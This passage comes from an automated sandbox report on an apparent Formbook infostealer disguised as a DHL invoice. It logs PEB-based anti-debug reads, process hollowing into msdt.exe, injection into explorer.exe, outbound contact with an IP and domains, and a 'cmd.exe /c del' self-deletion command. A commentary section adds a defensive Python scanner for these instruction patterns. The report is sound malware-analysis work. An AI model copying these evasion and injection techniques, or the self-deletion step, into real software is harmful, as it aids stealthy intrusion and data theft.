          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04902D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04931DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04986DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049B8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04913D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04934D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0498A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04924120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04927D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04943D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04983540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0499FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04948EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04905210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04923A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04938E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049C1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0490E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04944A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04994257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04909240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04917E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049CAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0492AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0494927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049BB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0491766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_049D8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_0493B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04932397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04918794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 11_2_04987794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeCode function: 3_2_0040ACF0 LdrLoadDll,
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeMemory allocated: page read and write | page guard
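Every `mov eax, dword ptr fs:[00000030h]` (or `mov ecx, ...`) row above is a read of the PEB pointer: on 32-bit Windows FS points at the TEB and TEB+0x30 holds the PEB address. What matters for triage is the field dereferenced next: PEB+2 (BeingDebugged) and PEB+0x68 (NtGlobalFlag) are anti-debug checks, PEB+0xC (Ldr) is the start of a manual import walk that avoids GetProcAddress. The following scanner is an added example, not code from the Joe Sandbox report: it locates these instruction encodings in raw x86 code, decodes the immediately following `mov`/`movzx` to name the PEB field, and collapses the report's rows to unique functions per process. The opcode bytes follow the standard x86 encoding; the hand-assembled stub and the shortened report rows are constructed inputs.

```python
"""Find PEB reads (mov r32, fs:[30h]) in raw x86 code and name the field read next.

Added example, not Joe Sandbox code. Constructed inputs only; no bytes from the sample.
"""
import re
from collections import defaultdict

# ModRM register index -> name (32-bit x86).
REG = {0: "eax", 1: "ecx", 2: "edx", 3: "ebx"}

# Encodings of `mov r32, dword ptr fs:[30h]`: 0x64 is the FS segment override, A1 is the
# short MOV EAX, moffs32 form, 8B /r with ModRM mod=00 rm=101 (0x05 | reg<<3) is [disp32].
PEB_READ = {b"\x64\xa1\x30\x00\x00\x00": 0}
for idx in REG:
    PEB_READ[b"\x64\x8b" + bytes([0x05 | (idx << 3)]) + b"\x30\x00\x00\x00"] = idx

# PEB offsets (32-bit) that anti-analysis code typically reads right after fs:[30h].
PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}


def classify_follow_up(code, pos, reg):
    """If the instruction at `pos` is `mov/movzx r, [reg+disp8]`, return the PEB field name."""
    if code[pos:pos + 2] == b"\x0f\xb6":          # movzx r32, r/m8
        modrm_at = pos + 2
    elif code[pos:pos + 1] in (b"\x8a", b"\x8b"):  # mov r8, r/m8 / mov r32, r/m32
        modrm_at = pos + 1
    else:
        return None
    if modrm_at + 1 >= len(code):
        return None
    modrm = code[modrm_at]
    if (modrm >> 6) != 0b01 or (modrm & 7) != reg:  # need mod=01 (disp8) and rm == the PEB register
        return None
    disp = code[modrm_at + 1]
    return PEB_FIELDS.get(disp, "PEB+0x%02x" % disp)


def scan_peb_reads(code):
    """Return sorted [(offset, register, field_or_None)] for every PEB read in `code`."""
    hits = []
    for pattern, reg in PEB_READ.items():
        start = 0
        while True:
            pos = code.find(pattern, start)
            if pos == -1:
                break
            hits.append((pos, REG[reg], classify_follow_up(code, pos + len(pattern), reg)))
            start = pos + 1
    return sorted(hits)


# Report-side helper: the rows repeat one line per access, so count functions, not rows.
ROW = re.compile(r"Code function: (\d+)_\d+_([0-9A-F]{8}) mov \w+, dword ptr fs:\[00000030h\]")


def unique_functions(rows):
    """Map the process index (the '3' in 3_2_014FFF10) to the set of functions reading the PEB."""
    per_proc = defaultdict(set)
    for row in rows:
        m = ROW.search(row)
        if m:
            per_proc[int(m.group(1))].add(int(m.group(2), 16))
    return dict(per_proc)


# Constructed test input: a hand-assembled anti-debug stub, not bytes from the sample.
STUB = (
    b"\x55\x8b\xec"                     # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"         # mov eax, fs:[30h]
    b"\x8a\x40\x02"                     # mov al, [eax+2]      ; PEB.BeingDebugged
    b"\x84\xc0\x75\x10"                 # test al, al ; jne debugger_found
    b"\x64\x8b\x0d\x30\x00\x00\x00"     # mov ecx, fs:[30h]
    b"\x8b\x41\x0c"                     # mov eax, [ecx+0Ch]   ; PEB.Ldr (manual import walk)
    b"\x64\xa1\x30\x00\x00\x00"         # mov eax, fs:[30h]
    b"\x8b\x40\x68"                     # mov eax, [eax+68h]   ; PEB.NtGlobalFlag
    b"\xc9\xc3"                         # leave; ret
)

# Rows copied from the report, with the path column trimmed.
REPORT_ROWS = [
    "Code function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]",
    "Code function: 3_2_01464F2E mov eax, dword ptr fs:[00000030h]",
    "Code function: 3_2_014916E0 mov ecx, dword ptr fs:[00000030h]",
    "Code function: 11_2_0493F0BF mov ecx, dword ptr fs:[00000030h]",
    "Code function: 11_2_0493F0BF mov eax, dword ptr fs:[00000030h]",
]

if __name__ == "__main__":
    for off, reg, field in scan_peb_reads(STUB):
        print("0x%04x  mov %s, fs:[30h]  ->  %s" % (off, reg, field))
    print({k: len(v) for k, v in unique_functions(REPORT_ROWS).items()})
```

The `Process queried: DebugPort` rows that follow are the other half of the same check (NtQueryInformationProcess with ProcessDebugPort), which is an API call rather than an instruction pattern and so is not found by this scanner. A scan like this over the unpacked region (the `3_2_` process, where the injected Formbook code runs) separates the handful of functions that touch BeingDebugged/NtGlobalFlag from the many that only walk PEB.Ldr to resolve imports.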

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 44.227.76.166 80
          Source: C:\Windows\explorer.exeDomain query: www.mimamincloor.com
          Source: C:\Windows\explorer.exeDomain query: www.federaldados.design
Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: B30000
Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeMemory written: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe base: 400000 value starts with: 4D5A
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3440
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeProcess created: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe
          Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe"
          Source: explorer.exe, 00000005.00000000.403617766.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.374553794.00000000083E8000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.398386364.0000000004F80000.00000004.00000001.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.364857450.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.396982165.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.425085384.00000000008B8000.00000004.00000020.sdmp, explorer.exe, 00000005.00000000.383606390.00000000008B8000.00000004.00000020.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.384921843.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.397294824.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.365817476.0000000000EE0000.00000002.00020000.sdmp, explorer.exe, 00000005.00000000.425639054.0000000000EE0000.00000002.00020000.sdmp, msdt.exe, 0000000B.00000002.622298398.0000000003140000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exe VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
          Source: C:\Users\user\Desktop\invoice dhl.delivery document and original invoice sign.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
